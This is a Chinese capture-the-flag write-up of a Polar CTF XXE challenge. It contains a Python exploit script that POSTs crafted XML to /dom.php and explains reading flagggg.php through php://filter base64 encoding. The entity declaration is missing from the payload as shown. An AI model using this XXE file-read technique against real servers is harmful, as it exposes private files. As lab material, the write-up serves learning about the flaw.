当前位置:个人在线分享 > Polar Web【中等】xxe

Polar Web【中等】xxe

作者 : admin 本文共827个字,预计阅读时间需要3分钟 发布时间: 2024-06-9 共2人阅读

Polar Web【中等】xxe

Contents

  • Polar Web【中等】xxe
    • 思路&探索
    • EXP
    • 运行&总结

思路&探索

如题目所示,此题考查XXE漏洞,具体细节需要逐步深挖

  1. 打开站点,提示了flag所在的文件,点击按钮,可见php的配置信息,搜索xml发现该服务可读取外部XML实体
  2. 由于并不清楚具体的注入路径,因此先对站点进行扫描,发现存在/dom.php路径
  3. 进入该路径发现下图中的报错信息,根据XXE漏洞的操作方式,采用POST方法将构造好的XML字符串传入/dom.php 站点,得到一串经由base64编码的字符串,解码后得到flag
  • 本文采用手动和脚本两种方式来实现解答

Polar Web【中等】xxe插图
Polar Web【中等】xxe插图(1)

  • 在使用HackBar传入时,经测试使用下面的模式来传数据才能生效
    Polar Web【中等】xxe插图(2)
    Polar Web【中等】xxe插图(3)
    Polar Web【中等】xxe插图(4)

EXP

import requests
import base64


def attack(url, pl):
    resp = requests.post(url, pl).text
    if resp:
    	# 为方便可读,对输出稍作处理
        out = resp[resp.index('textContent') + 16:resp.rindex(')')]
        out = base64.b64decode(out.encode()).decode()
        out = out[out.index('flag'):]
        print(out)
    else:
        print("Nothing...")


if __name__ == '__main__':
    u = 'http://~.www.polarctf.com:8090/dom.php'
    payload = '''
<!DOCTYPE polar [
        
        
        ]>
&polar;
    '''
    attack(u, payload)

运行&总结

Polar Web【中等】xxe插图(5)

  • 本题考查XXE漏洞的基本原理以及渗透方式,需要对XML文档结构和XML实体的引入方式有所了解
  • 在构造的外部XML实体中,采用的是php://filter/read(伪协议读取模块)中的base64编码器实现对服务器文件flagggg.php的读取

敬,不完美的明天

本站无任何商业行为
个人在线分享 » Polar Web【中等】xxe
admin

admin 钻石

分享到:

相关推荐

E-->